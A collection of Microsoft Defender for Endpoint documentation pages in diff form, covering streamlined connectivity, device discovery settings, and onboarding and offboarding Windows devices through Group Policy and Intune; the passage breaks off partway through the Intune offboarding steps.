--- [macOS supported versions](microsoft-defender-endpoint-mac.md) with MDE product version 101.24022.*+-- [Linux supported versions](microsoft-defender-endpoint-linux.md) with MDE product version 101.24022.*+-
-**Supported Operating Systems**
--- Windows 10 version 1809 or later
- - Windows 10 versions 1607, 1703, 1709, 1803 are supported on the streamlined onboarding package but require a different URL list, see [streamlined URL sheet](https://go.microsoft.com/fwlink/?linkid=2248278)
-- Windows 11-- Windows Server 2019-- Windows Server 2022-- Windows Server 2012 R2, Server 2016 R2, fully updated running Defender for Endpoint modern unified solution (installation through MSI).-- [macOS supported versions](microsoft-defender-endpoint-mac.md) with MDE product version 101.24022.*+-- [Linux supported versions](microsoft-defender-endpoint-linux.md) with MDE product version 101.24022.*+-
-> [!IMPORTANT]
-> - **Devices running on MMA agent are not supported** on the streamlined connectivity method and will need to continue using the standard URL set (Windows 7, Windows 8.1, Windows Server 2008 R2 MMA, Server 2012 & 2016 R2 not upgraded to modern unified agent).
-> - Windows Server 2012 R2 and Server 2016 R2 will need to upgrade to unified agent to leverage the new method. <br/>
-> - Windows 10 1607, 1703, 1709, 1803 can leverage the new onboarding option but will use a longer list. For more information, see [streamlined URL sheet](https://go.microsoft.com/fwlink/?linkid=2248278).
-
-| Windows OS | Minimum KB Required (March 8, 2022) |
-|:|:|
-| Windows 11 | KB5011493 (March 8, 2022) |
-| Windows 10 1809, Windows Server 2019 | KB5011503 (March 8, 2022) |
-| Windows 10 19H2 (1909) | KB5011485 (March 8, 2022) |
-| Windows 10 20H2, 21H2 | KB5011487 (March 8, 2022) |
-| Windows 10 22H2 | KB5020953 (October 28, 2022) |
-| Windows 10 1803* | < end of service > |
-| Windows 10 1709* | < end of service > |
-| Windows Server 2022 | KB5011497 (March 8, 2022) |
-| Windows Server 2012 R2, 2016* | Unified Agent |
-| Windows Server 2016 R2 | Unified Agent |
-
-## Streamlined connectivity process
-
-The following illustration shows the streamlined connectivity process and the corresponding stages:
---
-### Stage 1. Configure your network environment for cloud connectivity
-
-Once you confirm prerequisites are met, ensure your network environment is properly configured to support the streamlined connectivity method. Using the streamlined method (preview), follow the steps outlined in [Configure your network environment to ensure connectivity with Defender for Endpoint service](configure-environment.md).
-
-Defender for Endpoint services consolidated under the simplified method should no longer be required for connectivity. However, some URLs aren't included in the consolidation.
-
-Streamlined connectivity allows you to use the following option to configure cloud connectivity:
--- [Option 1: Use the simplified domain](#option-1-configure-connectivity-using-the-simplified-domain)-- [Option 2: Use static IP ranges](#option-2-configure-connectivity-using-static-ip-ranges)
-
-#### Option 1: Configure connectivity using the simplified domain
-
-Configure your environment to allow connections with the simplified Defender for Endpoint domain: `*.endpoint.security.microsoft.com`. For more information, see [Configure your network environment to ensure connectivity with Defender for Endpoint service](configure-environment.md).
-
-You must maintain connectivity with remaining required services listed under the [updated list](https://go.microsoft.com/fwlink/?linkid=2248278). For example, Certification Revocation List, Windows update, SmartScreen.
-
-#### Option 2: Configure connectivity using static IP ranges
-
-With streamlined connectivity, IP-based solutions can be used as an alternative to URLs. These IPs cover the following
--- MAPS-- Malware Sample Submission Storage-- Auto-IR Sample Storage-- Defender for Endpoint Command and Control-
-> [!IMPORTANT]
-> The EDR Cyber data service must be configured separately if you are using the IP method (this service is only consolidated on a URL level).You must also maintain connectivity with other required services including SmartScreen, CRL, Windows Update, and other services.<br/>
-
-In order to stay up to date on IP ranges, it is recommended to refer to the following Azure service tags for Microsoft Defender for Endpoint services. The latest IP ranges will always be found in the service tag. For more information, see [Azure IP ranges](https://azureipranges.azurewebsites.net/).
-
-| Service tag name | Defender for Endpoint services included |
-|:|:|
-| MicrosoftDefenderForEndpoint | MAPS, Malware Sample Submission Storage, Auto-IR Sample Storage, Command and Control. |
-| OneDsCollector | EDR Cyberdata <br/><br/> Note: The traffic under this service tag isn't limited to Defender for Endpoint and may include diagnostic data traffic for other Microsoft services. |
-
-The following table lists the current static IP ranges. For latest list, refer to the Azure service tags.
--
-|Geo|IP Ranges|
-||-|
-|US|`20.15.141.0/24` <br/> `20.242.181.0/24` <br/>`20.10.127.0/24`<br/>`13.83.125.0/24`|
-|EU|`4.208.13.0/24` <br/>`20.8.195.0/24`|
-|UK|`20.26.63.224/28` <br/>`20.254.173.48/28`|
-|AU|`68.218.120.64/28` <br/>`20.211.228.80/28`|
-
-> [!IMPORTANT]
-> In compliance with Defender for Endpoint security and compliance standards, your data will be processed and stored in accordance with your tenant's physical location. Based on client location, traffic may flow through any of these IP regions (which correspond to Azure datacenter regions). For more information, see [Data storage and privacy](/microsoft-365/security/defender-endpoint/data-storage-privacy).
-
-### Stage 2. Configure your devices to connect to Defender for Endpoint service
-
-Configure devices to communicate through your connectivity infrastructure. Ensure devices meet prerequisites and have updated sensor and Microsoft Defender Antivirus versions. For more information, see [Configure device proxy and Internet connection settings ](/microsoft-365/security/defender-endpoint/configure-proxy-internet).
-
-### Stage 3. Verify client connectivity preonboarding
-
-For more information, see [Verify client connectivity](verify-connectivity.md).
-
-The following preonboarding checks can be run on both Windows and Xplat MDE Client analyzer: [Download the Microsoft Defender for Endpoint client analyzer](download-client-analyzer.md).
-
-To test streamlined connectivity for devices not yet onboarded to Defender for Endpoint, you can use the Client Analyzer for Windows using the following commands:
--- Run `mdeclientanalyzer.cmd -o <path to cmd file>` from within MDEClientAnalyzer folder. The command uses parameters from onboarding package to test connectivity.--- Run `mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU>` , where parameter is of GW_US, GW_EU, GW_UK. GW refers to the streamlined option. Run with applicable tenant geo.-
-As a supplementary check, you can also use the client analyzer to test whether a device meets pre-requisites: https://aka.ms/BetaMDEAnalyzer
-
-
-> [!NOTE]
-> For devices not yet onboarded to Defender for Endpoint, client analyzer will test against standard set of URLs. To test the streamlined approach, you will need to run with the switches listed earlier in this article.
-
-### Stage 4. Apply the new onboarding package required for streamlined connectivity
-
-Once you configure your network to communicate with the full list of services, you can begin onboarding devices using the streamlined method. Note that onboarding via API isn't currently supported (includes Intune & Microsoft Defender for Cloud).
-
-Before proceeding, confirm devices meet the [prerequisites](#prerequisites) and have updated the sensor and Microsoft Defender Antivirus versions.
--
-To get the new package, in Microsoft Defender XDR, select **Settings > Endpoints > Device management> Onboarding**.
--
-Select the applicable operating system and choose "Streamlined (preview)" from the Connectivity type dropdown menu.
-
- For new devices (not onboarded to Defender for Endpoint) supported under this method, follow onboarding steps from previous sections using the updated onboarded package with your preferred deployment method:
--- [Onboard Windows Client](onboard-windows-client.md)-- [Onboard Windows Server](configure-server-endpoints.md)-- [Onboard non-Windows devices](configure-endpoints-non-windows.md)-- [Run a detection test on a device to verify it has been properly onboarded to Microsoft Defender for Endpoint](run-detection-test.md)--
-Exclude devices from any existing onboarding policies that use the standard onboarding package.
-
-For migrating devices already onboarded to Defender for Endpoint, see [Migrating devices to the streamlined connectivity](migrate-devices-streamlined.md). You must reboot your device and follow specific guidance here.
---
-When you're ready to set the default onboarding package to streamlined, you can turn on the following Advanced Feature setting in the Microsoft Defender portal (**Settings > Endpoints > Advanced Features**).
-
-> [!NOTE]
-> Before moving forward with this option, validate that your environment is ready and all devices meet prerequisites.
---
-This setting sets the default onboarding package to 'streamlined' for applicable operating systems. You can still use the standard onboarding package within the onboarding page but you must specifically select it in the drop-down.
security Configure Device Discovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-device-discovery.md
- Title: Configure device discovery
-description: Learn how to configure device discovery in Microsoft Defender XDR using basic or standard discovery
--- NOCSH------ m365-security-- tier1-- Previously updated : 03/23/2021--
-# Configure device discovery
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Discovery can be configured to be on standard or basic mode. Use the standard option to actively find devices in your network, which will better guarantee the discovery of endpoints and provide richer device classification.
-
-You can customize the list of devices that are used to perform standard discovery. You can either enable standard discovery on all the onboarded devices that also support this capability (currently - Windows 10 or later and Windows Server 2019 or later devices only) or select a subset or subsets of your devices by specifying their device tags.
-
-## Set up device discovery
-
-To set up device discovery, take the following configuration steps in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
-
-Navigate to **Settings** > **Device discovery**
-
-1. If you want to configure Basic as the discovery mode to use on your onboarded devices, select **Basic** and then select **Save**
-2. If you've selected to use Standard discovery, select which devices to use for active probing: all devices or on a subset by specifying their device tags, and then select **Save**
-
-> [!NOTE]
-> Standard discovery uses various PowerShell scripts to actively probe devices in the network. Those PowerShell scripts are Microsoft signed and are executed from the following location: `C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\*.ps`. For example, `C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\UnicastScannerV1.1.0.ps1`.
-
-## Exclude devices from being actively probed in standard discovery
-
-If there are devices on your network that shouldn't be actively scanned (for example, devices used as honeypots for another security tool), you can also define a list of exclusions to prevent them from being scanned. Note that devices can still be discovered using Basic discovery mode and can also be discovered through multicast discovery attempts. Those devices will be passively discovered but won't be actively probed.
-
-You can configure the devices to exclude in the **Exclusions** page.
-
-## Select networks to monitor
-
-Microsoft Defender for Endpoint analyzes a network and determines if it's a corporate network that needs to be monitored or a non-corporate network that can be ignored. To identify a network as corporate, we correlate network identifiers across all tenant's clients and if most devices in the organization report that they're connected to the same network name, with the same default gateway and DHCP server address, we assume that this is a corporate network. Corporate networks are typically chosen to be monitored. However, you can override this decision by choosing to monitor non-corporate networks where onboarded devices are found.
-
-You can configure where device discovery can be performed by specifying which networks to monitor. When a network is monitored, device discovery can be performed on it.
-
-A list of networks where device discovery can be performed is shown in the **Monitored networks** page.
-
-> [!NOTE]
-> The list shows networks that were identified as corporate networks. If less than 50 networks are identified as corporate networks, then list will show up to 50 networks with the most onboarded devices.
-
-The list of monitored networks is sorted based upon the total number of devices seen on the network in the last seven days.
-
-You can apply a filter to view any of the following network discovery states:
--- **Monitored networks** - Networks where device discovery is performed.-- **Ignored networks** - This network is ignored and device discovery isn't performed on it.-- **All** - Both monitored and ignored networks are displayed.-
-### Configure the network monitor state
-
-You control where device discovery takes place. Monitored networks are where device discovery is performed and are typically corporate networks. You can also choose to ignore networks or select the initial discovery classification after modifying a state.
-
-Choosing the initial discovery classification means applying the default system-made network monitor state. Selecting the default system-made network monitor state means that networks that were identified to be corporate, are monitored, and ones identified as non-corporate, are ignored automatically.
-
-1. Select **Settings > Device discovery**.
-2. Select **Monitored networks**.
-3. View the list of networks.
-4. Select the three dots next to the network name.
-5. Choose whether you want to monitor, ignore, or use the initial discovery classification.
-
- > [!WARNING]
- >
- > - Choosing to monitor a network that was not identified by Microsoft Defender for Endpoint as a corporate network can cause device discovery outside of your corporate network, and may therefore detect home or other non-corporate devices.
- > - Choosing to ignore a network will stop monitoring and discovering devices in that network. Devices that were already discovered won't be removed from the inventory, but will no longer be updated, and details will be retained until the data retention period of the Defender for Endpoint expires.
- > - Before choosing to monitor non-corporate networks, you must ensure you have permission to do so. <br>
-
-6. Confirm that you want to make the change.
-
-## Explore devices in the network
-
-You can use the following advanced hunting query to get more context about each network name described in the networks list. The query lists all the onboarded devices that were connected to a certain network within the last seven days.
-
-```kusto
-DeviceNetworkInfo
-| where Timestamp > ago(7d)
-| where ConnectedNetworks != ""
-| extend ConnectedNetworksExp = parse_json(ConnectedNetworks)
-| mv-expand bagexpansion = array ConnectedNetworks=ConnectedNetworksExp
-| extend NetworkName = tostring(ConnectedNetworks ["Name"]), Description = tostring(ConnectedNetworks ["Description"]), NetworkCategory = tostring(ConnectedNetworks ["Category"])
-| where NetworkName == "<your network name here>"
-| summarize arg_max(Timestamp, *) by DeviceId
-```
-
-## Get information on device
-
-You can use the following advanced hunting query to get the latest complete information on a specific device.
-
-```kusto
-DeviceInfo
-| where DeviceName == "<device name here>" and isnotempty(OSPlatform)
-| summarize arg_max(Timestamp, *) by DeviceId
-```
-
-## See also
--- [Device discovery overview](device-discovery.md)-- [Device discovery FAQs](device-discovery-faq.md)
security Configure Endpoints Gp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-gp.md
- Title: Onboard Windows devices to Microsoft Defender for Endpoint via Group Policy
-description: Use Group Policy to deploy the configuration package on Windows devices so that they are onboarded to the service.
------- m365-security-- tier1-- Previously updated : 09/15/2023---
-# Onboard Windows devices using Group Policy
---
-**Applies to:**
--- Group Policy-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configureendpointsgp-abovefoldlink)
-
-> [!NOTE]
-> To use Group Policy (GP) updates to deploy the package, you must be on Windows Server 2008 R2 or later.
->
-> For Windows Server 2019 and Windows Server 2022, you may need to replace NT AUTHORITY\Well-Known-System-Account with NT AUTHORITY\SYSTEM of the XML file that the Group Policy preference creates.
-
-> [!NOTE]
-> If you're using the new, unified Microsoft Defender for Endpoint solution for Windows Server 2012 R2 and 2016, please ensure you are using the latest ADMX files in your central store to get access to the correct Microsoft Defender for Endpoint policy options. Please reference [How to create and manage the Central Store for Group Policy Administrative Templates in Windows](/troubleshoot/windows-client/group-policy/create-and-manage-central-store) and download the latest files **for use with Windows 10**.
-
-Check out [Identify Defender for Endpoint architecture and deployment method](deployment-strategy.md) to see the various paths in deploying Defender for Endpoint.
-
-1. Open the GP configuration package file (`WindowsDefenderATPOnboardingPackage.zip`) that you downloaded from the service onboarding wizard. You can also get the package from the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
-
- 1. In the navigation pane, select **Settings** > **Endpoints** > **Device management** > **Onboarding**.
-
- 1. Select the operating system.
-
- 1. In the **Deployment method** field, select **Group policy**.
-
- 1. Click **Download package** and save the .zip file.
-
-2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the device. You should have a folder called *OptionalParamsPolicy* and the file *WindowsDefenderATPOnboardingScript.cmd*.
-
-3. To create a new GPO, open the [Group Policy Management Console](/internet-explorer/ie11-deploy-guide/group-policy-and-group-policy-mgmt-console-ie11) (GPMC), right-click **Group Policy Objects** you want to configure and click **New**. Enter the name of the new GPO in the dialogue box that is displayed and click **OK**.
-
-4. Open the [Group Policy Management Console](/internet-explorer/ie11-deploy-guide/group-policy-and-group-policy-mgmt-console-ie11) (GPMC), right-click the Group Policy Object (GPO) you want to configure and click **Edit**.
-
-5. In the **Group Policy Management Editor**, go to **Computer configuration**, then **Preferences**, and then **Control panel settings**.
-
-6. Right-click **Scheduled tasks**, point to **New**, and then click **Immediate Task (At least Windows 7)**.
-
-7. In the **Task** window that opens, go to the **General** tab. Under **Security options** click **Change User or Group** and type SYSTEM and then click **Check Names** then **OK**. NT AUTHORITY\SYSTEM appears as the user account the task will run as.
-
-8. Select **Run whether user is logged on or not** and check the **Run with highest privileges** check box.
-
-9. In the Name field, type an appropriate name for the scheduled task (for example, Defender for Endpoint Deployment).
-
-10. Go to the **Actions** tab and select **New...** Ensure that **Start a program** is selected in the **Action** field. Enter the UNC path, using the file server's fully qualified domain name (FQDN), of the shared *WindowsDefenderATPOnboardingScript.cmd* file.
-
-11. Select **OK** and close any open GPMC windows.
-
-12. To link the GPO to an Organization Unit (OU), right-click and select **Link an existing GPO**. In the dialogue box that is displayed, select the Group Policy Object that you wish to link. Click **OK**.
-
-> [!TIP]
-> After onboarding the device, you can choose to run a detection test to verify that the device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Defender for Endpoint device](run-detection-test.md).
-
-## Additional Defender for Endpoint configuration settings
-
-For each device, you can state whether samples can be collected from the device when a request is made through Microsoft Defender XDR to submit a file for deep analysis.
-
-You can use Group Policy (GP) to configure settings, such as settings for the sample sharing used in the deep analysis feature.
-
-### Configure sample collection settings
-
-1. On your GP management device, copy the following files from the
- configuration package:
-
- - Copy _AtpConfiguration.admx_ into _C:\\Windows\\PolicyDefinitions_
-
- - Copy _AtpConfiguration.adml_ into _C:\\Windows\\PolicyDefinitions\\en-US_
-
- If you're using a [Central Store for Group Policy Administrative Templates](https://support.microsoft.com/help/3087759/how-to-create-and-manage-the-central-store-for-group-policy-administra), copy the following files from the
- configuration package:
-
- - Copy _AtpConfiguration.admx_ into _\\\\\<forest.root\>\\SysVol\\\<forest.root\>\\Policies\\PolicyDefinitions_
-
- - Copy _AtpConfiguration.adml_ into _\\\\\<forest.root\>\\SysVol\\\<forest.root\>\\Policies\\PolicyDefinitions\\en-US_
-
-2. Open the [Group Policy Management Console](/internet-explorer/ie11-deploy-guide/group-policy-and-group-policy-mgmt-console-ie11), right-click the GPO you want to configure and click **Edit**.
-
-3. In the **Group Policy Management Editor**, go to **Computer configuration**.
-
-4. Click **Policies**, then **Administrative templates**.
-
-5. Click **Windows components** and then **Windows Defender ATP**.
-
-6. Choose to enable or disable sample sharing from your devices.
-
-> [!NOTE]
-> If you don't set a value, the default value is to enable sample collection.
-
-## Other recommended configuration settings
-
-### Update endpoint protection configuration
-
-After configuring the onboarding script, continue editing the same group policy to add endpoint protection configurations. Perform group policy edits from a system running Windows 10 or Server 2019, Windows 11, or Windows Server 2022 to ensure you have all of the required Microsoft Defender Antivirus capabilities. You may need to close and reopen the group policy object to register the Defender ATP configuration settings.
-
-All policies are located under `Computer Configuration\Policies\Administrative Templates`.
-
-**Policy location:** \Windows Components\Windows Defender ATP
-
-Policy|Setting
-|
-Enable\Disable Sample collection|Enabled - "Enable sample collection on machines" checked
-
-<br>
-
-**Policy location:** \Windows Components\Microsoft Defender Antivirus
-
-Policy|Setting
-|
-Configure detection for potentially unwanted applications|Enabled, Block
-
-<br>
-
-**Policy location:** \Windows Components\Microsoft Defender Antivirus\MAPS
-
-Policy|Setting
-|
-Join Microsoft MAPS|Enabled, Advanced MAPS
-Send file samples when further analysis is required | Enabled, Send safe samples
-
-<br>
-
-**Policy location:** \Windows Components\Microsoft Defender Antivirus\Real-time Protection
-
-Policy|Setting
-|
-Turn off real-time protection|Disabled
-Turn on behavior monitoring|Enabled
-Scan all downloaded files and attachments|Enabled
-Monitor file and program activity on your computer|Enabled
-
-<br>
-
-**Policy location:** \Windows Components\Microsoft Defender Antivirus\Scan
-
-These settings configure periodic scans of the endpoint. We recommend performing a weekly quick scan, performance permitting.
-
-Policy|Setting
-|
-Check for the latest virus and spyware security intelligence before running a scheduled scan |Enabled
-
-<br>
-
-**Policy location:** \Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Attack Surface Reduction
-
-Get the current list of attack surface reduction rules GUIDs from [Attack surface reduction rules deployment Step 3: Implement ASR rules](attack-surface-reduction-rules-deployment-implement.md). For additional, per rules details, see [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
-
-1. Open the **Configure Attack Surface Reduction** policy.
-
-1. Select **Enabled**.
-
-1. Select the **Show** button.
-
-1. Add each GUID in the **Value Name** field with a Value of 2.
-
- This will set each up for audit only.
-
- :::image type="content" source="media/asr-guid.png" alt-text="The Attack surface reduction configuration" lightbox="media/asr-guid.png":::
-
-Policy|Location|Setting
-||
-Configure Controlled folder access| \Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Controlled Folder Access| Enabled, Audit Mode
-
-## Run a detection test to verify onboarding
-
-After onboarding the device, you can choose to run a detection test to verify that a device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md).
-
-## Offboard devices using Group Policy
-
-For security reasons, the package used to Offboard devices will expire 30 days after the date it was downloaded. Expired offboarding packages sent to a device will be rejected. When downloading an offboarding package you'll be notified of the packages expiry date and it will also be included in the package name.
-
-> [!NOTE]
-> Onboarding and offboarding policies must not be deployed on the same device at the same time, otherwise this will cause unpredictable collisions.
-
-1. Get the offboarding package from the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
-
- 1. In the navigation pane, select **Settings** > **Endpoints** > **Device management** > **Offboarding**.
-
- 1. Select the operating system.
-
- 1. In the **Deployment method** field, select **Group policy**.
-
- 1. Click **Download package** and save the .zip file.
-
-2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the device. You should have a file named *WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd*.
-
-3. Open the [Group Policy Management Console](/internet-explorer/ie11-deploy-guide/group-policy-and-group-policy-mgmt-console-ie11) (GPMC), right-click the Group Policy Object (GPO) you want to configure and click **Edit**.
-
-4. In the **Group Policy Management Editor**, go to **Computer configuration,** then **Preferences**, and then **Control panel settings**.
-
-5. Right-click **Scheduled tasks**, point to **New**, and then click **Immediate task**.
-
-6. In the **Task** window that opens, go to the **General** tab under **Security options** and select **Change User or Group**, enter SYSTEM, then select **Check Names** and then **OK**. NT AUTHORITY\SYSTEM appears as the user account that the task will run as.
-
-7. Select **Run whether user is logged on or not** and check the **Run with highest privileges** check-box.
-
-8. In the Name field, type an appropriate name for the scheduled task (for example, Defender for Endpoint Deployment).
-
-9. Go to the **Actions** tab and select **New...**. Ensure that **Start a program** is selected in the **Action** field. Enter the UNC path, using the file server's fully qualified domain name (FQDN), of the shared *WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd* file.
-
-10. Select **OK** and close any open GPMC windows.
-
-> [!IMPORTANT]
-> Offboarding causes the device to stop sending sensor data to the portal but data from the device, including reference to any alerts it has had will be retained for up to 6 months.
-
-## Monitor device configuration
-
-With Group Policy there isn't an option to monitor deployment of policies on the devices. Monitoring can be done directly on the portal, or by using the different deployment tools.
-
-## Monitor devices using the portal
-
-1. Go to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-2. Click **Devices inventory**.
-3. Verify that devices are appearing.
-
-> [!NOTE]
-> It can take several days for devices to start showing on the **Devices list**. This includes the time it takes for the policies to be distributed to the device, the time it takes before the user logs on, and the time it takes for the endpoint to start reporting.
-
-## Setup Defender AV policies
-
-Create a new Group Policy or group these settings in with the other policies. This is dependent upon the customer's environment and how they would like to roll out the service by targeting different organizational units (OUs).
-
-1. After you choose the GP, or create a new one, edit the GP.
-
-2. Browse to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus** > **Real-time Protection**.
-
- :::image type="content" source="media/realtime-protect.png" alt-text="Real-time protection" lightbox="media/realtime-protect.png":::
-
-1. In the Quarantine folder, configure removal of items from Quarantine folder.
-
- :::image type="content" source="media/removal-items-quarantine1.png" alt-text="Removal items quarantine folder" lightbox="media/removal-items-quarantine1.png":::
-
- :::image type="content" source="media/config-removal-items-quarantine2.png" alt-text="config-removal quarantine" lightbox="media/config-removal-items-quarantine2.png":::
-
-4. In the Scan folder, configure the scan settings.
-
- :::image type="content" source="media/gpo-scans.png" alt-text="gpo scans" lightbox="media/gpo-scans.png":::
-
-### Monitor all files in Real time protection
-
-Browse to **Computer Configuration** \> **Policies** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Real-time Protection**.
--
-### Configure Windows Defender SmartScreen settings
-
-1. Browse to **Computer Configuration** \> **Policies** \> **Administrative Templates** \> **Windows Components** \> **Windows Defender SmartScreen** \> **Explorer**.
-
- :::image type="content" source="media/config-windows-def-smartscr-explorer.png" alt-text="Configure windows defender smart screen explorer" lightbox="media/config-windows-def-smartscr-explorer.png":::
-
-2. Browse to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Windows Defender SmartScreen** > **Microsoft Edge**.
-
- :::image type="content" source="media/configure-windows-defender-smartscreen.png" alt-text="Configure windows defender smart screen on Microsoft Edge" lightbox="media/configure-windows-defender-smartscreen.png":::
-
-### Configure Potentially Unwanted Applications
-
-Browse to **Computer Configuration** \> **Policies** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus**.
---
-### Configure Cloud Deliver Protection and send samples automatically
-
-Browse to **Computer Configuration** \> **Policies** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **MAPS**.
-----
-> [!NOTE]
-> The **Send all samples** option will provide the most analysis of binaries/scripts/docs which increases security posture.
-The **Send safe samples** option limits the type of binaries/scripts/docs being analyzed, and decreases security posture.
-
-For more information, see [Turn on cloud protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md), and [Cloud protection and sample submission in Microsoft Defender Antivirus.](cloud-protection-microsoft-antivirus-sample-submission.md)
-
-### Check for signature update
-
-Browse to **Computer Configuration** \> **Policies** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Security Intelligence Updates**.
---
-### Configure cloud deliver timeout and protection level
-
-Browse to **Computer Configuration** \> **Policies** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **MpEngine**.
-When you configure cloud protection level policy to **Default Microsoft Defender Antivirus blocking policy** this will disable the policy. This is what is required to set the protection level to the windows default.
---
-## Related topics
-- [Onboard Windows devices using Microsoft Endpoint Configuration Manager](configure-endpoints-sccm.md)-- [Onboard Windows devices using Mobile Device Management tools](configure-endpoints-mdm.md)-- [Onboard Windows devices using a local script](configure-endpoints-script.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)-- [Run a detection test on a newly onboarded Microsoft Defender for Endpoint devices](run-detection-test.md)-- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Endpoints Mdm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-mdm.md
- Title: Onboard Windows devices to Defender for Endpoint using Intune
-description: Use Microsoft Intune to deploy the configuration package on devices so that they're onboarded to the Defender for Endpoint service.
------- m365-security-- tier1--- Previously updated : 03/28/2024--
-# Onboard Windows devices to Defender for Endpoint using Intune
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configureendpointsmdm-abovefoldlink)
-
-You can use mobile device management (MDM) solutions to configure Windows 10 devices. Defender for Endpoint supports MDMs by providing OMA-URIs to create policies to manage devices.
-
-For more information on using Defender for Endpoint CSP, see, [WindowsAdvancedThreatProtection CSP](https://msdn.microsoft.com/library/windows/hardware/mt723296(v=vs.85).aspx) and [WindowsAdvancedThreatProtection DDF file](https://msdn.microsoft.com/library/windows/hardware/mt723297(v=vs.85).aspx).
-
-## Before you begin
-
-Devices must be enrolled with Intune as your Mobile Device Management (MDM) solution.
-
-For more information on enabling MDM with Microsoft Intune, see [Device enrollment (Microsoft Intune)](/mem/intune/enrollment/device-enrollment).
-
-## Onboard devices using Microsoft Intune
-
-Check out [Identify Defender for Endpoint architecture and deployment method](deployment-strategy.md) to see the various paths in deploying Defender for Endpoint.
-
-Follow the instructions from [Intune](/mem/intune/protect/advanced-threat-protection-configure#enable-microsoft-defender-for-endpoint-in-intune).
-
-For more information on using Defender for Endpoint CSP, see, [WindowsAdvancedThreatProtection CSP](https://msdn.microsoft.com/library/windows/hardware/mt723296(v=vs.85).aspx) and [WindowsAdvancedThreatProtection DDF file](https://msdn.microsoft.com/library/windows/hardware/mt723297(v=vs.85).aspx).
-
-> [!NOTE]
->
-> - The **Health Status for onboarded devices** policy uses read-only properties and can't be remediated.
-> - Configuration of diagnostic data reporting frequency is only available for devices on Windows 10, version 1703.
-> - Onboarding to Defender for Endpoint will onboard the device to [Data Loss Prevention (DLP)](../../compliance/endpoint-dlp-learn-about.md), which is also a part of Microsoft 365 compliance.
--
-## Run a detection test to verify onboarding
-
-After onboarding the device, you can choose to run a detection test to verify that a device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md).
--
-## Offboard devices using Mobile Device Management tools
-
-For security reasons, the package used to Offboard devices will expire 30 days after the date it was downloaded. Expired offboarding packages sent to a device will be rejected. When downloading an offboarding package you'll be notified of the packages expiry date and it will also be included in the package name.
-
-> [!NOTE]
-> Onboarding and offboarding policies must not be deployed on the same device at the same time, otherwise this will cause unpredictable collisions.
-
-1. Get the offboarding package from <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
-
- 2. In the navigation pane, select **Settings** \> **Endpoints** \> **Device management** \> **Offboarding**.
-
- 3. Select Windows 10 or Windows 11 as the operating system.
-
- 4. In the **Deployment method** field, select **Mobile Device Management / Microsoft Intune**.
-
- 5. Click **Download package**, and save the .zip file.
-
-2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the network administrators who will deploy the package. You should have a file named *WindowsDefenderATP_valid_until_YYYY-MM-DD.offboarding*.
-
-3. Use the Microsoft Intune custom configuration policy to deploy the following supported OMA-URI settings.
-
